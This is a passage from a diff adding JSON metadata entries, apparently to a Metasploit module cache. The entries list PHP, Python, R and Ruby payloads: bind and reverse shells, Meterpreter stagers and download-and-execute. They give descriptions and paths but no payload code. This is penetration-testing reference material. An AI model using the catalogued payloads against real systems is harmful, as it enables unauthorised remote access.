"PHP Command Shell, Bind TCP (via perl) IPv6", + "fullname": "payload/php/bind_perl_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz " + ], + "description": "Listen for a connection and spawn a command shell via perl (persistent) over IPv6", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/bind_perl_ipv6.rb", + "is_install_path": true, + "ref_name": "php/bind_perl_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/bind_php": { + "name": "PHP Command Shell, Bind TCP (via PHP)", + "fullname": "payload/php/bind_php", + "aliases": [], + 
"rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "diaul " + ], + "description": "Listen for a connection and spawn a command shell via php", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/bind_php.rb", + "is_install_path": true, + "ref_name": "php/bind_php", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/bind_php_ipv6": { + "name": "PHP Command Shell, Bind TCP (via php) IPv6", + "fullname": "payload/php/bind_php_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "diaul " + ], + "description": "Listen for a connection and spawn a command shell via php (IPv6)", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/bind_php_ipv6.rb", + "is_install_path": true, + "ref_name": "php/bind_php_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/download_exec": { + "name": "PHP Executable Download and Execute", + "fullname": "payload/php/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Download an EXE from an HTTP URL and execute it", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 
02:57:34 +0000", + "path": "/modules/payloads/singles/php/download_exec.rb", + "is_install_path": true, + "ref_name": "php/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/exec": { + "name": "PHP Execute Command ", + "fullname": "payload/php/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Execute a single system command", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/exec.rb", + "is_install_path": true, + "ref_name": "php/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/meterpreter/bind_tcp": { + "name": "PHP Meterpreter, Bind TCP Stager", + "fullname": "payload/php/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Run a meterpreter server in PHP.\n\nListen for a connection", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/bind_tcp.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/bind_tcp" + }, + 
"payload_php/meterpreter/bind_tcp_ipv6": { + "name": "PHP Meterpreter, Bind TCP Stager IPv6", + "fullname": "payload/php/meterpreter/bind_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/bind_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/bind_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/bind_tcp_ipv6" + }, + "payload_php/meterpreter/bind_tcp_ipv6_uuid": { + "name": "PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support", + "fullname": "payload/php/meterpreter/bind_tcp_ipv6_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6 with UUID Support", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/bind_tcp_ipv6_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/bind_tcp_ipv6_uuid" + }, + "payload_php/meterpreter/bind_tcp_uuid": 
{ + "name": "PHP Meterpreter, Bind TCP Stager with UUID Support", + "fullname": "payload/php/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in PHP.\n\nListen for a connection with UUID Support", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/bind_tcp_uuid" + }, + "payload_php/meterpreter/reverse_tcp": { + "name": "PHP Meterpreter, PHP Reverse TCP Stager", + "fullname": "payload/php/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/reverse_tcp" + }, + "payload_php/meterpreter/reverse_tcp_uuid": { + "name": "PHP Meterpreter, PHP Reverse TCP 
Stager", + "fullname": "payload/php/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/php/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "php/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "php/meterpreter", + "stager_refname": "php/reverse_tcp_uuid" + }, + "payload_php/meterpreter_reverse_tcp": { + "name": "PHP Meterpreter, Reverse TCP Inline", + "fullname": "payload/php/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Connect back to attacker and spawn a Meterpreter server (PHP)", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "php/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/reverse_perl": { + "name": "PHP Command, Double Reverse TCP Connection (via Perl)", + "fullname": "payload/php/reverse_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + 
"author": [ + "cazz " + ], + "description": "Creates an interactive shell via perl", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/reverse_perl.rb", + "is_install_path": true, + "ref_name": "php/reverse_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/reverse_php": { + "name": "PHP Command Shell, Reverse TCP (via PHP)", + "fullname": "payload/php/reverse_php", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Reverse PHP connect back shell with checks for disabled functions", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/reverse_php.rb", + "is_install_path": true, + "ref_name": "php/reverse_php", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_php/shell_findsock": { + "name": "PHP Command Shell, Find Sock", + "fullname": "payload/php/shell_findsock", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "egypt " + ], + "description": "Spawn a shell on the established connection to\n the webserver. Unfortunately, this payload\n can leave conspicuous evil-looking entries in the\n apache error logs, so it is probably a good idea\n to use a bind or reverse shell unless firewalls\n prevent them from working. 
The issue this\n payload takes advantage of (CLOEXEC flag not set\n on sockets) appears to have been patched on the\n Ubuntu version of Apache and may not work on\n other Debian-based distributions. Only tested on\n Apache but it might work on other web servers\n that leak file descriptors to child processes.", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/php/shell_findsock.rb", + "is_install_path": true, + "ref_name": "php/shell_findsock", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/exec": { + "name": "Python Execute Command", + "fullname": "payload/python/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute an arbitrary OS command. 
Compatible with Python 2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-04 10:43:40 +0000", + "path": "/modules/payloads/singles/python/exec.rb", + "is_install_path": true, + "ref_name": "python/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/meterpreter/bind_tcp": { + "name": "Python Meterpreter, Python Bind TCP Stager", + "fullname": "payload/python/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/bind_tcp.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp" + }, + "payload_python/meterpreter/bind_tcp_uuid": { + "name": "Python Meterpreter, Python Bind TCP Stager with UUID Support", + "fullname": "payload/python/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", + "references": [], + "platform": 
"Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp_uuid" + }, + "payload_python/meterpreter/reverse_http": { + "name": "Python Meterpreter, Python Reverse HTTP Stager", + "fullname": "payload/python/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_http.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_http" + }, + "payload_python/meterpreter/reverse_https": { + "name": "Python Meterpreter, Python Reverse HTTPS Stager", + "fullname": "payload/python/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using 
SSL", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_https.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_https" + }, + "payload_python/meterpreter/reverse_tcp": { + "name": "Python Meterpreter, Python Reverse TCP Stager", + "fullname": "payload/python/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp" + }, + "payload_python/meterpreter/reverse_tcp_ssl": { + "name": "Python Meterpreter, Python Reverse TCP SSL Stager", + "fullname": "payload/python/meterpreter/reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell ", + "RageLtMan" + ], + "description": "Run a meterpreter server in Python 
(compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_ssl" + }, + "payload_python/meterpreter/reverse_tcp_uuid": { + "name": "Python Meterpreter, Python Reverse TCP Stager with UUID Support", + "fullname": "payload/python/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "python/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_uuid" + }, + "payload_python/meterpreter_bind_tcp": { + "name": "Python Meterpreter Shell, Bind TCP Inline", + "fullname": "payload/python/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": 
"payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Connect to the victim and spawn a Meterpreter shell", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb", + "is_install_path": true, + "ref_name": "python/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/meterpreter_reverse_http": { + "name": "Python Meterpreter Shell, Reverse HTTP Inline", + "fullname": "payload/python/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Connect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "python/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/meterpreter_reverse_https": { + "name": "Python Meterpreter Shell, Reverse HTTPS Inline", + "fullname": "payload/python/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Connect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "python/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/meterpreter_reverse_tcp": { + "name": "Python Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/python/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Connect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "python/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/pingback_bind_tcp": { + "name": "Python Pingback, Bind TCP (via python)", + "fullname": "payload/python/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Listens for a connection from the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/pingback_bind_tcp.rb", + "is_install_path": true, + 
"ref_name": "python/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/pingback_reverse_tcp": { + "name": "Python Pingback, Reverse TCP (via python)", + "fullname": "payload/python/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Connects back to the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "python/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_bind_tcp": { + "name": "Command Shell, Bind TCP (via python)", + "fullname": "payload/python/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mumbai" + ], + "description": "Creates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "python/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_reverse_sctp": { + "name": "Command Shell, Reverse SCTP (via python)", + "fullname": "payload/python/shell_reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-08 06:44:37 +0000", + "path": "/modules/payloads/singles/python/shell_reverse_sctp.rb", + "is_install_path": true, + "ref_name": "python/shell_reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_reverse_tcp": { + "name": "Command Shell, Reverse TCP (via python)", + "fullname": "payload/python/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Campbell " + ], + "description": "Creates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "python/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_reverse_tcp_ssl": { + "name": "Command Shell, Reverse TCP SSL (via python)", + "fullname": "payload/python/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "python/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_reverse_udp": { + "name": "Command Shell, Reverse UDP (via python)", + "fullname": "payload/python/shell_reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/shell_reverse_udp.rb", + "is_install_path": true, + "ref_name": "python/shell_reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_r/shell_bind_tcp": { + "name": "R Command Shell, Bind TCP", + "fullname": "payload/r/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Continually listen for a connection and spawn a command shell via R", + "references": [], + "platform": "R", + "arch": "r", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/r/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "r/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_r/shell_reverse_tcp": { + "name": "R Command Shell, Reverse TCP", + "fullname": "payload/r/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Connect back and create a command shell via R", + "references": [], + "platform": "R", + "arch": "r", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/r/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "r/shell_reverse_tcp", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/pingback_bind_tcp": { + "name": "Ruby Pingback, Bind TCP", + "fullname": "payload/ruby/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Listens for a connection from the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 19:02:28 +0000", + "path": "/modules/payloads/singles/ruby/pingback_bind_tcp.rb", + "is_install_path": true, + "ref_name": "ruby/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/pingback_reverse_tcp": { + "name": "Ruby Pingback, Reverse TCP", + "fullname": "payload/ruby/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Connect back to the attacker, sends a UUID, then terminates", + "references": [], + "platform": 